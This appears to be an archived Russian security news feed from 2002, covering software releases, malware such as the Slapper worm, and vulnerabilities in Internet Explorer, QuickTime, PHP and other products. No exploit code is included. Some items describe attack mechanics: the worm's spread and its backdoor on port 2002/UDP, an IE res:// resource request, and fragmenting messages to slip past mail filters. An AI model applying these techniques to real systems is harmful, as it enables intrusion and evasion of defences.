16/09/2002 Cтатья "Разоблачая мифы".
На известном российском сайте Дмитрия Леонова www.bugtraq.ru, посвящённому компьютерной безопасности, опубликована статья А.В.Лукацкого "Разоблачая мифы". Автор последовательно и основательно рассматривает (и разоблачает, как следует из названия) принятые в среде СМИ (и отделов по обеспечению информационной безопасности фирм) мифы. Мифы разделены на 3 основных группы: мифы об информационной безопасности, мифы о хакерах, мифы о средствах защиты. Довольно поучительная сттья. Примечательно окончание вступительного слова в статью: "Если вы сами не раз говорили такие слова или слышали их из уст своих начальников, то, будьте уверены, - у вас очень большая прореха в системе защиты вашей организации". Статья - http://www.bugtraq.ru/library/security/luka/myth.html
16/09/2002 В конце сентября выйдет Norton Personal Firewall 2003.
Компания Symantec готовится выпустить новую версию одного из лучших персональных брандмауэров Norton Personal Firewall. Продукт, получивший название Norton Personal Firewall 2003 поступит в продажу в конце сентября. В него заложены функции мониторинга входящих и исходящих интернет-соединений, блокировки рекламы, защиты конфиденциальности и защиты от вторжений. Большинство из этих функций являются дальнейшим развитием возможностей Norton Personal Firewall 2002, хотя в новой версии имеются и некоторые нововведения. Для облегчения конфигурирования брандмауэра в него заложена информация о наиболее распространенных программных продуктах, использующих подключение к интернету, и создание правил, регламентирующих их работу в онлайне, происходит автоматически. Естественно, сохранилась и возможность ручной установки таких правил. Источник - http://biz.yahoo.com/bw/020916/160079_1.html
16/09/2002 В США украдены 140 тысяч номеров кредитных карт.
Как сообщается на сайте MSNBC, несколько интернет-компаний, оказывающих услуги по проведению онлайновых расчетов, заявили о возможной краже 140 тысяч номеров кредитных карт. Представитель компании SpitFire заявил, что на прошлой неделе неизвестные злоумышленники пытались перевести на собственный банковский счет деньги со 140 тысяч кредитных карт. В результате, небольшие суммы денег (около 5 долларов) были сняты с помощью системы SpitFire, с 62 тысяч кредитных карт. Таким образом, киберпреступники пополнили свой счет на 300 тысяч долларов. В пятницу стало известно, что аналогичные проблемы испытывают и другие компании, оказывающие услуги по денежным переводам в интернете. Представитель SpitFire заявил, что в конце прошлой недели в компанию позвонили несколько сотен владельцев кредитных карт, пытаясь узнать причину снятия денег с их счетов. Подробности - http://www.compulenta.ru/2002/9/16/33961/
16/09/2002 NetBSD 1.6 released
Проект NetBSD представил версию 1.6 операционной системы NetBSD. NetBSD широко известна как самая портируемая операционная сисмема в мире. На данный момент дерево исходных кодов поддерживает пятьдесят две аппаратные платформы. Более того, NetBSD постоянно находится в состоянии переноса на другие платформы. NetBSD 1.6 продолжает старую добрую традицию, по которой в каждом следующем официальном выпуске файловая система и подсистема памяти существенно переработаны, введены значительные усовершенствования в средства защиты (так, в этом выпуске были интегрированы средства IPSec, SSH и Kerberos 5), а также реализована поддержка новых платформи новых периферийных устройств. Подробности - http://netbsd.org/ru/Releases/formal-1.6/NetBSD-1.6.html
15/09/2002 Инструкции по удалению червя Slapper-A.
Червь, использующий уязвимость в SSL-модуле Апача (мы о нём писали вчера) получил название в среде антивирусных компаний Slapper-A. Компания SOPHOS-один из производителей антивирусов, опубликовала на своём сервере шаги, которые должны быть предприняты для удаления червя из системы в разных операционных системах-рассматриваются ОС: Win 95/98/ME, NT/2000/XP, MacOS, DOS, OS/2, Netware, Unix, OpenVMS. Подробности - http://www.sophos.com/support/disinfection/worms.html
15/09/2002 Статья "Используем память видеокарты для создания рамдиска".
Статья Михаила Шульца "VRAM Storage Device - How to use the memory on GFX board" открывает пользователям Linux, имеющим видеокарты с большим объемом ОЗУ, уникальную возможность - использованием излишков видеопамяти для таких целей как помещения в ОЗУ видеокарты swap-раздела, создание ramdisk и размещения там, например, /tmp области, использование для создания бездисковых машин. Ссылка на статью - http://hedera.linuxnews.pl/_news/2002/09/03/_long/1445.html
15/09/2002 Обновления для QNX 6.2 NC
Выпущены обновления для QNX 6.2 NC, исправляющие ошибки безопасности в системе. Статус обновлений - экспериментальные. Подробности об ошибках - на форуме и на странице обновлений. Скачать - http://www.qnx.com/developer/download/updates/mo_nc_6.2/ Источник - http://www.qnx.org.ru
14/09/2002 Некоторые подробности работы нового SSL-червя.
После анализа нового червя в форуме в списке рассылки BUGTRAQ специалистами (среди них Дейв Ахмад из Symantec, Фернандо Нуньес, и др.) был выявлен механизм распространения червя. Он использует уязвимость в mod_ssl сервера Апач. обнаруженную ещё 30 июля, и после проникноввения в машину (получения шелла) создаёт файл /tmp/.bugtraq.c (занятное название, правда?). После этого происходит компиляция программы и её запуск с ip-адресом другого компьютера в качестве аргумента (кстати, её можно обнаружить - ps -ax | grep bugtraq). После заражения машина-носитель червя становится как бы членом виртуальной сети таких же заражённых компьютеров. Связь между машинами осуществляется через порт 2002/UDP. Послав запрос на этот порт, можно: выполнить команду на заражённом компьютере, направлять сообщения другой машине виртуальной сети, выполнить атаку типа TCP flood & DNS flood, сканировать на другой машине файлы, которые могут содержать E-mail адреса. В данный момент ищутся меры по предотвращению распространения червя. Один из вариантов - блокировка файрволлами порта 2002/UDP. Mario Van Velzen предлагает в качестве временной меры запретить на Вэб-серверах ServerTokens, либо установить их в ProductOnly. Как сообщила "Лаборатория Касперского" (см. предыдущее сообщение), червь уже включён в их базу данных. На данный момент подтверждена уязвимость в дистрибутивах Linux - Red-Hat: Apache 1.3.6, 1.3.9, 1.3.12, 1.3.19, 1.3.20, 1.3.22, 1.3.23, 1.3.26 SuSe: Apache 1.3.12, 1.3.17, 1.3.19, 1.3.20, 1.3.23 Mandrake: 1.3.14,1.3.19 Slakware: Apache 1.3.26. Источник - http://www.securityfocus.com
14/09/2002 Microsoft исследует уязвимость в системе безопасности Word.
Специалисты корпорации Microsoft считают, что обнаруженная брешь позволяет злоумышленникам воровать файлы, тайно отслеживая документ при помощи скрытого кода. Фирма ищет пути к исправлению проблемы, а также пытается найти возможность исправления более ранних версий программного обеспечения, все еще используемого миллионами пользователей. Атака начинается в том случае, если документ выходит за пределы компьютера, обычно с запросом на исправление и возврат отправителю. Когда документ изменен и отправлен обратно, с ним вместе присылается и файл-"мишень". Брешь чаще всего проявляется в том случае, когда Word является наиболее используемой текстовой программой. Потенциальными целями для злоумышленников являются стратегические легальные контракты, записи и электронная почта по платежным ведомостям. Подобные документы могут быть "похищены" либо с жесткого диска, либо из компьютерной сети, - в зависимости от прав доступа жертвы к соответствующим файлам. В заявлении Microsoft говорится: "Скорее всего, эта неполадка проявляется во всех версиях Microsoft Word. Когда исследование будет завершено, мы проведем специальную акцию, которая поможет нашим клиентам исправить брешь в ПО." Наиболее уязвимой предположительно является версия Word 97. Корпорация Microsoft ранее заявляла, что в соответствии с политикой компании Word 97 больше не подлежит обслуживанию. Однако она все еще содержит указанную брешь. По данным исследовательских фирм в мае текущего года около 32% офисов использовали в своей работе Word 97. Источник - http://www.viruslist.com/index.html?tnews=1002&id=1084417
14/09/2002 Возвращение червя Морриса ?
"Лаборатория Касперского", российский лидер в области разработки антивирусных систем безопасности, сообщает об обнаружении нового опасного Интернет-червя "Slapper", заражающего компьютеры под управлением операционной системы Linux и использующего технологию распространения в исходных текстах, впервые примененную в 1988 г. в печально известном черве Морриса. На данный момент компания не получила сообщений от пользователей о фактах заражения этой вредоносной программой. Вместе с тем, детальный анализ кода "Slapper" подтверждает его работоспособность и, таким образом, червь представляет собой потенциальную угрозу для пользователей Linux. Для определения потенциальной жертвы "Slapper" сканирует компьютеры в сети Интернет и определяет те из них, на которых установлена операционная система Linux и Web-сервер Apache. При обнаружении такого компьютера червь незаметно загружает на него свою копию, используя для этого брешь в системе безопасности программного пакета OpenSSL (переполнение буфера). Главное отличие "Slapper" заключается в том, что копия, передаваемая на компьютер-жертву, представляет собой исходный, некомпилированный код червя. После загрузки "Slapper" запускает установленный практически на каждой Linux-машине компилятор языка C (gcc), получает исполняемую версию червя и запускает ее на выполнение. Такой оригинальный подход обеспечивает "Slapper" совместимость с любыми типами Linux - вне зависимости от производителя дистрибутива и версии ядра. Подробности - http://www.kaspersky.ru/news.html?id=971443
13/09/2002 Cтатья "Securing dynamic Web content".
На одном из Вэб-серверов компании IBM была опубликована статья Tom Syroid о настройке динамических компонентов популярного Вэб-сервера Apache. На заре развития WWW, сервера предоставляли своё содержимое в виде статических страниц, написанных при помощи языка HTML. По мере развития Вэб-технологий возникла необходимость взаимодействия с посетителями WWW-серверов и представлять содержимое страниц динамически-в зависимости или от представляемых сервером форм, или от результатов обработки запросов пользователя скриптов, расположенных на сервере. Подобные технологии, обеспечивающие динамечское представление информации Вэб-сервера получили название SSI (Server Side Includes) и CGI (Common Gateway Interface). Настройке безопасности SSI и CGI Вэб-сервера Apache и посвящена статья. Представляет интерес для Вэб-мастеров и системных администраторов, занимающихся настройкой и обеспечением безопасности Вэб-серверов. Статья доступна - http://www-106.ibm.com/developerworks/security/library/s-wssec.html?t=gr,lnxw08=ApachedSecurity
13/09/2002 Microsoft покупает хакеров, взламывавших Xbox.
В Microsoft придумали новый способ борьбы со взломщиками игровой приставки Xbox. На сайте компании появилось объявление о найме на работу специалистов по взлому встроенных в приставку систем безопасности. Похоже, замысел состоит в том, чтобы обратить знания и энергию хакеров себе на службу. В этом году в интернете началась продажа так называемых мод-чипов для Xbox. Его установка позволяла запускать на устройстве пиратские копии игр и любые другие программы, официально не предназначенное для работы на Xbox. Сходство конструкции Xbox с конструкцией обычного ПК упрощает подобные эксперименты. В объявлении на сайте Microsoft говорится, что компаниия ищет сотрудника, который будет отвечать за "сбор, оценку и анализ информации о мод-чипах, а также участвовать в разработке новых средств защиты Xbox". В описании работы также говорится о том, что "предпочтение будет отдано тем, кто имеет опыт во взломе систем защиты". Источник - http://www.compulenta.ru
13/09/2002 Ложная тревога о новом черве "I-Worm.Chet".
Некоторые информационные агентства и разработчики антивирусного ПО предупреждали пользователей о возможном распространении 11 сентября нового интернет-червя "I-Worm.Chet", затрагивающего, соответственно, тему прошлогодней трагедии в Нью-Йорке. Однако, как выяснили специалисты Лаборатории Касперского, червь содержит несколько серьёзных ошибок, и его запуск в некоторых случаях приводит к стандартному сообщению Windows о недопустимой операции. Ошибки также содержатся в процедуре рассылки писем, в результате чего риск заражения данным интернет-червём крайне низок. Источник - http://www.viruslist.com
13/09/2002 Возможность обхода защиты почтовых серверов.
Группа Beyond Security's SecurITeam обнаружила возможность обхода защиты почтовых серверов, основанной на фильтрации содержимого почтового сообщения. Такая защита применяется на многих почтовых серверах. В качестве основы применяются продукты таких известных фирм, как Check Point (FW-1), GFI (MailSecurity for Exchange/SMTP), Symantec (Norton AntiVirus), TrendMicro (InterScan VirusWall), SonicWALL, NAI и др. Используя нестандартное представление имени файла, MIME-частей и содержимого можно обойти системы фильтрации содержимого. Причём, как утверждают авторы, для этого достаточно иметь почтовый клиент Outlook Express. Для организации атаки применяется мало известная способность Outlook под названием 'message fragmentation and re-assembly' (разбиение сообщения на части с последующей сборкой). Предназначено это малоизвестное свойство Outlook Express для того, чтобы пользователи на медленных Интрернет/Интранет-каналах могли посылать большие сообщения, дробя их на части с последующей сборкой цельного сообщения на противоположной стороне. Эта осбенность почты документирована в RFC2046, секция 5.2.2.1 "Message Fragmentation and Reassembly". Подобные сообщения не обнаруживаются стоящими на мейл-серверах вирус-сканерами и другими инструментами фильтрации содержимого. Разбив содержимое вируса/червя, представленного в виде (для примера) "VIRUS SIGNATURE" на 2 части (1-VIRUS, 2-SIGNATURE) можно обойти антивирусные инструменты, настроенные на поиск в теле письма вируса в цельном виде. При этом получатель после "сборки" получит вирус (червь) в цельном виде. При исследовании был сделан вывод, что единственным клиентом, который делает это "на лету" ("flick of button"), оказался Outlook Express. Возможность сборки фрагментированной почты включена в нём по умолчанию, а вот для фрагментации сообщения придётся немного потрудиться, а именно: выполнить следующую последовательность действий - Tools -> Accounts -> Choose your email account -> Advanced -> Sending / Break apart messages larger than [...]. Другие клиенты (включая и Microsoft Outlook) такой "возможности" лишены. Таким образом, и уязвимыми на "другом" конце соединения остаются всё те же пользователи OE, что, учитывая огромную распространённость этого клиента у корпоративных пользователей представляет большую опасность. Подробное описание - http://www.securiteam.com/securitynews/5YP0A0K8CM.html
12/09/2002 Переполнение буфера в ssldump.
Авторами пакета ssldump обнаружена уязвимость, которая может привести к переполению буфера и, как следствие, к получению контроля над сервером, на котором запущен ssldump. ssldump-сетевой анализатор зашифрованных протоколов SSLv3/TLS. Уязвимость связана с двумя ошибками. Первая из них заключается в том, что ssldump расшифровать т.н. PreMasterSecret (PMS) в буфер размером 48 байт, таким образом можно послать PMS большей длины и переполнить буфер. При этом длина PMS при шифровании 1024-битным ключём RSA ограничена 64 битами. Вторая ошибка в том, что ssldump не проверяет длину SSLv2 "challenge". Эксплоита в данный момент пока не существует, однако авторы рекомендуют обновить ssldump до версии 0.9b3. Новая версия ssldump - http://www.rtfm.com/ssldump/ssldump-0.9b3.tar.gz
12/09/2002 Локальная уязвимость в Slackware 7.1.
Как утверждает в списке рассылки BUGTRAQ "Cloud Ass" , им обнаружена уязвимость в Slackware 7.1 в пакете efstool (работа с журналируемой файловой системой EFS), позволяющая локально получить права root. Автором выпущен соответствующий исходник под названием efstool.c. Источник - http://www.securityfocus.com
12/09/2002 Уязвимости в Konqueror.
Дирк Мюллер из kde.org опубликовал бюллетень по безопасности, в котором утверждается, что в броузере Kongueror графической оболочки KDE, выпускаемой для многих ОС с открытым исходным кодом (Linux, FreeBSD, NetBSD, OpenBSD) присутствуют уязвимости. Первая из них связана с тем, что Konqueror неправильно принимает флаг "secure" в принимаемых при работе с зашифрованным каналом cookies и посылает ответ серверу по незашифрованному(открытому) каналу, что может привести к угрозе конфиденциальности или к подмене сессии (hijack) злоумышленником. Уязвимость связана с версией KDE, при этом версия 2.2.2 не обладает этой уязвимостью, а 3.0-3.0.2 обладают. Всем пользователям рекомндуют обновить KDE до 3.0.3. Вторая уязвимость имеет тип CSS (Cross Site Scripting) и позволяет злоумышленнику перенаправить жертву на другой сайт с возможностью доступа к coockies. В этом случае рекомендуется обновить библиотеку KDE до kdelibs-3.0.3a. Более подробно бюллетени - http://www.kde.org/info/security/advisory-20020908-1.txt Второй - http://www.kde.org/info/security/advisory-20020908-2.txt
11/09/2002 Выход Internet Explorer 6 SP1.
Фирма Microsft выпустила Internet Explorer 6 Service Pack1. SP1 IE6 включает в себя все выпущенные ранее исправления, в том числе ликвидирует уязвимость, вызываемую установкой кумулятивного патча от 11 февраля. Вот часть списка исправленных ошибок и внесенных дополнений: ошибка Access Violation при просмотре документов формата HTA или XML, потеря cookies, неправильное определение размера страницы, ошибка при работе по протоколу SSL, некорректное отображение рисунков в формате EMF (Enhanced Metafile Format), возможность удаленно просматривать файлы на компьютере пользователя при его заходе на специальным образом созданную HTML-страницу или с помощью VBScript. IE6 SP1 предназначен для браузеров, работающих в Windows 98, ME, 2000, XP, а также NT 4.0 c SP 6a и Windows Advanced Server Limited Edition. Предлагается сначала скачать инсталляционный модуль (500 кБ). Размер самого Service Pack зависит от выбранных при установке опций. Как правило, это не менее 11 мегабайт. Полный перечень изменений - http://support.microsoft.com/common/canned.aspx?... Инсталляционный модуль - http://www.microsoft.com/downloads/release.asp?ReleaseID=42706&area=search&ordinal=1
11/09/2002 Доступ к файловой системе и выполнение произвольного кода в Internet Explorer + Microsoft JVM.
Обнаружено несколько уязвимостей в Microsoft Java Virtual Machine(JVM). По сообщениям, уязвимость связанна с методами, определенными Microsoft, которые используются в пределах различных классов. Уязвимость позволяет атакующему получить доступ к файловой системе или выполнять произвольный код на уязвимой системе вне ограничений sandbox. Уязвимость не воздействует на Sun JVM. Уязвимость обнаружена в Microsoft Internet Explorer 5.0-6.0 + Microsoft JVM 1.1 Подробности - http://www.SecurityLab.ru/?ID=32873
11/09/2002 Очередная уязвимость в Internet Explorer.
GreyMagic Software из Израиля была обнаружена уязвимость в броузере Internet Explorer версии 5.5 и выше (предыдущие версии не подвержены уязвимости). Было обнаружено, что при помощи тегов <frame>, <iframe> (inline frame) можно выполнить любой скрипт, игнорируя ограничения, выставленные для протоколов и доменов при помощи IE. Это значит, что атакующий может похитить cookies почти любого сайта, получить доступ к содержимому любого сайта и изменению его содержимого, и даже читать локальные файлы на компьютере "жертвы", выполнив скрипт в пределах зоны "My Computer". Для того, чтобы получить доступ к локальным ресурсам, необходимо обратиться к ресурсу, называемому Microsoft "PrivacyPolicy.dlg", сформировав запрос вида res://shdoclc.dll/privacypolicy.dlg. Авторы также выложили 4 примера для проверки уязвимости. В качестве временной меры для предотвращения уязвимости рекомендуется отключить Active Scripting. Для предотвращения уязвимости Microsoft выпустил Internet Explorer 6 Service Pack 1 (окончательный билд 6.0.2800.1106), где были запрещены ссылки типа file:// res://, что, по мнению авторов уязвимости, всё-таки не устранило окончательно самой уязвимости. Уязвимы также продукты, использующие движок IE (Outlook, MSN Explorer, etc). Подробное описание и демонстрация - http://security.greymagic.com/adv/gm010-ie/
11/09/2002 Выход Mozilla 1.0.1
Mozilla Organization анонсировала вчера выход новой версии популярного броузера Mozilla ветки 1.0 - 1.0.1. Как сказано в анонсе, новая версия содержит более 650 багофиксов, включая около 25 исправлений, касающихся системы безопасности броузера и более 130 исправлений, касающихся стабильности работы Mozilla. Более подробно - http://www.mozilla.org/releases/mozilla1.0.1/
11/09/2002 Переполнение буфера в Apple QuickTime.
@stake Inc. была обнаружена уязвимость в популярном медиа-плэере Quick Time, производимом фирмой Apple. Уязвимость, связанная с переполнением буфера присутствует в ActiveX-компоненте, предназначенном для работы с так называемыми movie trailers и другими потоковыми и статическими медиа-технологиями, внедрёнными в HTML-страницу. При разборе поля "pluginspage" в специально сформированной HTML-странице, можно переполнить буфер на компьютере "жертвы", просматривающей содержимой WWW-сайта и выполнить произвольный код на удалённом компьютере. Для выполнения подобной атаки злоумышленнику необходимо убедить (заставить) "жертву" открыть специально офрмленный HTML-файл либ в качестве присодиненного файла к почтовому сообщению, либо как файл локальный или удалённый (например на WWW-сайте). Уязвимость присутствует в версии Apple QuickTime до 5.0.2 включительно. Apple выпустил версию 6, в которой уязвимости нет и настоятельно рекомендует её скачать всем пользователям QuikTime. @stake Inc. также опубликовала HTML-код, позволяющий использовать эту уязвимость. Более подробно - http://www.atstake.com/research/advisories/2002/a091002-1.txt
10/09/2002 Патчи для увеличения производительности Linux ядра.
Con Kolivas собрал в одном месте наиболее популярные патчи для Linux ядер 2.4.18 и 2.4.19, которые призваны уменьшить время отклика системы и теоретически привести к увеличению производительности всей системы. Источник - http://www.opennet.ru/opennews/art.shtml?num=1493 Патчи - http://members.optusnet.com.au/ckolivas/kernel/
10/09/2002 Вышел Gaim v0.59.2
Новый релиз популярного ICQ (и не только) клона под Linux. На этот раз - множественные баг-фиксы, апдейты в переводах. Скачать - http://prdownloads.sourceforge.net/gaim/gaim-0.59.2.tar.bz2 ChangeLog - http://gaim.sourceforge.net/ChangeLog
10/09/2002 Вирус Klez.E сработал в России
Российские пользователи ощутили на себе опасность вируса Klez.E, срабатывающего на шестой день каждого нечётного месяца. Шестого сентября количество обращений в службу технической поддержки "Лаборатории Касперского" увеличилось на 80%. "Рост был вызван, в основном, активизацией деструктивной функции Klez.E", - комментирует произошедшее руководитель информационной службы "Лаборатории Касперского" Денис Зенкин. По его словам, наибольшую опасность Klez.E представляет для домашних пользователей. Для большинства корпоративных заказчиков, вовремя латающих дыры в Internet Explorer и обновляющих антивирусные программы, угроза вируса невелика. Это объясняет, почему некоторые антивирусные компании поспешили заявить, что очередная активизация Klez.E не принесла особого вреда. Так, компания Sophos сообщила, что 6 сентября не зафиксировано ни одного случая потери данных, связанного с деятельностью вируса. В "Лаборатории Касперского" считают, что данные Sophos односторонни и отражают, главным образом, состояние дел британских корпоративных пользователей. "В России Klez.E имел достаточно негативные последствия", - говорит Зенкин. Более подробно о вирусе и борьбе с ним - http://www.viruslist.com/viruslist.html?id=4415
10/09/2002 Microsoft запрещает публикацию результатов тестирования компонентов Windows
Один из читателей сайта Inquirer обнаружил, что в текст лицензионного соглашения, прилагающегося ко всем обновлениям для операционной системы Windows, с недавних пор была добавлена следующая фраза: "Вы не имеете права сообщать третьим лицам результаты любого тестирования компонентов среды .NET этой операционной системы без предварительного письменного разрешения компании Microsoft". Такое условие ставит под угрозу весь бизнес этого читателя, поскольку он является консультантом по программному обеспечению. Обычной практикой для этой деятельности является демонстрация клиентам результатов тестирования различных операционных систем. После ввода этого ограничения таким консультантам придется обращаться в Microsoft за разрешением на осуществление своей профессиональной деятельности, в противном случае их может ожидать уголовное преследование и полное банкротство. Источник - http://www.compulenta.ru/2002/9/10/33792/
10/09/2002 Внедрение CRLF в PHP функцию header() (межсайтовый скриптинг и т.п.)
Уязвимость обнаружена в способе, которым некоторые PHP сценарии обрабатывают входящие URL. Уязвимость позволяет нападающим заставлять такие сценарии отображать произвольный HTML или JavaScript код, который будет выполнен в контексте уязвимого сайта. Пример: PHP функция header() используется, чтобы изменить HTTP заголовки, определяя строку header. Более подробно - http://www.securitylab.ru/?ID=32843
10/09/2002 Множественные переполнения в системных утилитах в Compaq/HP Tru64
Обнаружено несколько возможностей удаленного переполнения буфера в операционной системе Tru64 в множестве системных библиотек и утилит. Tru64 поставляется с собственной методикой защиты стека от выполнения в нем кода. Однако защита не справляется с обнаруженными уязвимостями, которые могут использоваться локальным пользователем для выполнения произвольного кода с повышенными привилегиями. Источник и пример эксплоита - http://www.securitylab.ru/?ID=32835
9/09/2002 Вирус в Firehand Ember Millenium.
"Лаборатория Касперского" сообщает об обнаружении троянской программы FireAnvil, встроенной в коммерческий продукт "Firehand Ember Millenium" американской компании Firehand Technologies Corporation. "Firehand Ember Millenium" - программное обеспечение для просмотра и редактирования графических изображений, содержит троянские подпрограммы обнаружены в двух файлах продукта: Ember32.exe - основной файл данного программного продукта fireutil.dll - библиотека Активизация вредоносного кода происходит при вводе регистрационных данных пользователя, при условии, если в поле "Registered User ID" вводится строка "czy czy" (в любом регистре). Источник - http://www.viruslist.com/index.html?tnews=1001&id=1071683
9/09/2002 Государства терроризируют свободу в Интернет.
Многие западные демократические государства, стали врагом номер один для «цифровой свободы» в Интернете. Осуществляя антитеррористические операции, многие страны воспользовались сложившейся ситуацией, чтобы под прикрытием защиты от терроризма ограничить свободу слова в Интернет и ввести цензуру и ограничения. Об этом во вторник заявили Международная Ассоциация по защите цифровых прав. Источник - http://www.internet.ru/article/lentanews/2002/09/06/8196.html
8/09/2002 Новая версия PHP.
Вышла новая версия PHP v.4.2.3, в новой версии сделано много исправлений и поэтому разработчики рекомендует всем пользователям обновить старую версию. PHP 4 ChangeLog - http://www.php.net/ChangeLog-4.php Скачать - http://www.php.net/downloads.php
7/09/2002 Статья: Удаленное администрирование Linux систем.
В статье описываются различные варианты удаленного администрирования Linux, от использования ssh и telnet, доступа через сериальный порт, до удаленного запуска XWindow приложений. Даются практические советы по настройке описываемого ПО. Источник - http://www.opennet.ru/opennews/art.shtml?num=1483 Читать - http://www.linuxplanet.com/linuxplanet/tutorials/4400/1/
6/09/2002 Критическая уязвимость в продуктах Microsoft.
Обнаружена уязвимость в продуктах Microsoft, уязвимость заключается в ошибке CryptoAPI, что позволяет злоумышленнику с достоверным сертификатом создать второй, фальшивый сертификат с целью несанкционированного доступа к компьютерам и кражи паролей или номеров кредитных карт. Источник - http://zdnet.ru/?ID=287284 Патч - http://www.microsoft.com/technet/
6/09/2002 Уязвимость в PGP Corporate Edition.
Обнаружена уязвимость в PGP Corporate Edition 7.1.0 и 7.1.1, использование которой может привести к захвату атакующим управления над уязвимой системой. Уязвимость заключается в некорректной обработке длинных имен файлов в шифрованном архиве, вследствие чего происходит переполнение буфера. Источник - http://www.bezpeka.com/news/2002/09/0601.html Подробнее - http://www.foundstone.com
6/09/2002 Microsoft Windows 2000 Service Pack 3.
Вышел SP3 для русской версии Windows 2000. Скачать - http://download.microsoft.com (124Мб)
6/09/2002 VeriSign может потерять лицензию на право продаж доменных имен.
В связи с ошибками обнаруженными в базе WhoIs от VeriSign, VeriSign может быть лишена права на право продаж доменных имен. Internet Corporation for Assigned Names and Numbers настаивает на этой мере поскольку база VeriSign содержит заведомо неверные данные: например, "Yellow Brick Road" или "Oz, Kansas" в качестве адреса владельца. В огромной базе (~ 10.3 миллиона записей) ICANN пока что указывает на 17 подобных ошибок за последние 18 месяцев. ICANN дала VeriSign пятнадцать дней, чтобы ошибки были исправлены, иначе VeriSign автоматически перестанет быть доменным регистратором. Подробнее: http://news.com.com/2100-1023-956433.html?tag=fd_top Posted by: Roman
5/09/2002 Вместо SecureID - мобилка
RSA Security уже давно предлагает на рынке ситему двухфакторной аутентификации под названием SecureID. Клиенту выдается небольшое (размером с брелок или кредитку) устройство (токен), в котором происходит периодическая смена кода. Для доступа к ресурсу (web-серверу и т.п.) клиент не просто предъявляет пин-код или пароль, а комбинирует его с кодом из SecureID. Проверка всего этого безобразия производится на специальном сервере, на котором коды "крутятся" по тому же алгоритму, что и в токенах. Всем хороша система, но ее широкое внедрение сдерживает тот факт, что пользователям/клиентам необходимо выдавать специальное устройство. Теперь RSA Security предлагает решение этой проблемы при помощи новой разработки - RSA Mobile... Подробности - http://www.bugtraq.ru/rsn/archive/2002/09/04.html
4/09/2002 Возможность подделки цифровой подписи в MS Outlook.
Обнаружена уязвимость в MS Outlook, которая позволяет легко подменить цифровую подпись в электронном сообщении, в результате чего, это сообщение будет просмотренно без каких либо предупреждений. Подробнее - http://online.securityfocus.com/news/604
4/09/2002 Microsoft IIS6: веб-сервер строгого режима.
Разработчики IIS все-таки поняли свою ошибку и приняли мудрое решение изменить конфигурацию по умолчанию в IIS6. Если IIS6 установлен, то он автоматически подключен и по умолчанию находится в состоянии изоляции, то есть не может делать практически ничего полезного. Его функции нужно специально включать. Помимо этого, в нем есть новые средства фильтрации, позаимствованные из брандмауэров, такие как возможность отфильтровывать на входе потенциально опасные запросы. Источник - http://www.zdnet.ru/?ID=286939
3/09/2002 Mandrake Linux 9.0 Release Candidate 1 Released
Текущий резил вместил в себе GNOME2, KDE3, OpenOffice и многое другое. Источник - http://linuxtoday.com/news_story.php3?ltsn=2002-09-03-006-26-NW-MD-SW
3/09/2002 Двадцатка самых распространенных вирусов за август
Компания "Лаборатория Касперского" представила очередную двадцатку вирусов, доставивших пользователям PC больше всего хлопот в августе. Месяц не преподнёс никаких сюрпризов. Вирус I-Worm.Klez - безусловный лидер (76,45% от общего числа заражений), а на втором месте находится вирус I-Worm.Lentin (21,66%). Третье место занимает печально известный Win95.CIH (0,45%). В двадцатке до сих пор присутствуют "хиты" прошлого года, такие как Hybris (5 место) и Sircam (7 место).
1. I-Worm.Klez (76,45%) 2. I-Worm.Lentin (21,66%) 3. Win95.CIH (0,45%) 4. Abba (0,24%)
Полный список http://www.compulenta.ru/2002/9/2/33603/
2/09/2002 Баг в Trillian.
Обнаружен баг в популярной чат-программе - Trillian v.0.73, баг заключается в том, что возможно создать "скин", который вызовет переполнение буфера. Подробнее - http://www.net-security.org/vuln.php?id=2012
2/09/2002 "Надежное" голосование на mysql.com.
На прошлой недели mysql.com проводили голосование на тему: "На каком языке вы хотите видеть наш сайт". С отрывом больше чем в 20тысяч голосов выиграли русские, т.к. больше всех смогли накрутить голосовалку :) Должно быть немного стыдно програмерам mysql.com за такой "классно" написаный скрипт, кот. для идентификации уже проголосовавшего юзера просто выставлял куку. Посмотреть рез-ты: http://www.mysql.com/feedback/quickpoll.php?id=language Posted by: BioHazard
1/09/2002 "Honeynet" в действии.
В США Science Applications International Corp. (SAIC) создало беспроводную сеть, которая является первой, так называемой "honeynet", т.е. сеть созданная как приманка для хакера, чтобы изучить методы взлома беспроводных сетей, которые используются при атаке. Подробнее - http://news.com.com/2100-1033-956126.html
1/09/2002 Ура! Новая система новостей.
Как вы уже наверное догадались, мы обновили нашу систему новостей, теперь она будет более интересной и безглючной. Система переписана с нуля, вместе со всеми алгоритмами, более того, теперь появились дополнительные колонки (Program of the day, Last 10 FTP Updates, Site Updates) и улучшился дизайн. Кроме того, теперь появилась кнопочка "Добавить новость", так что вы сами можете добавить к нам новость. В колонке Program of the day мы будем делать ежедневные обзоры интересных программ, Last 10 FTP Updates показывает последние обновления пакетов на нашем ftp, а Site Updates будет показывать последние новости нашего сайта. Мы надеемся, что новая система вам очень понравится, а если нет, то спамить сюда: web@uinc.ru
30/08/2002 JVC изобрела "некопируемые" диски CD-ROM.
Производитель потребительской электроники JVC и разработчик игр Hudson Soft создали новую технологию защиты от копирования - Root, которая, как они утверждают, положит конец подделке дисков CD-ROM. Технология Root — названная так потому, что она якобы пресекает нелегальное копирование "под корень" (from the Roots up) — использует шифрование со специальным ключом. Новшество состоит способе, которым прячется ключ: считать его можно на любом дисководе CD-ROM, но при попытке записать с помощью дисковода CD-R/RW копия диска получается нечитабельной. Каждый диск имеет собственный ключ, который всякий раз прячется в новом месте. Источник - http://www.zdnet.ru/?ID=286813
30/08/2002 Статья: Расчет трафика через Iptables.
В статье описаны технологии измерения трафика пользователей и трафика от провайдера с использованием iptables. Читать - http://www.opennet.ru/base/net/traf_mes.txt.html
30/08/2002 MiddleMan - интересный прокси сервер.
Данная программа является прокси сервером для unix платформ. Особенности данного прокси сервера: + Маленький размер + Возможность фильтрации любых хедеров + Поддержка, как обычных http/https, так и socks4 проксей + Настройка через простой XML файл Домашняя страничка MiddleMan: http://middle-man.sourceforge.net
29/08/2002 Уязвимость в Microsoft Terminal Server ActiveX.
Обнаружена уязвимость в параметре "server name" Microsoft Terminal Server ActiveX. Уязвимость приводит к переполнению буфера и позволяет злоумышленнику выполнить произвольный программный код на компьютере жертвы, используя для этого Web-страницу, почтовое сообщение или HTML файл со специальным кодом. Подвержены данной уязвимости оказались MS Windows 95/98/NT 4.0/2000/XP. Подробнее - http://www.atstake.com/research/advisories/2002/a082802-1.txt
29/08/2002 Релиз Symantec Norton Ghost 2003.
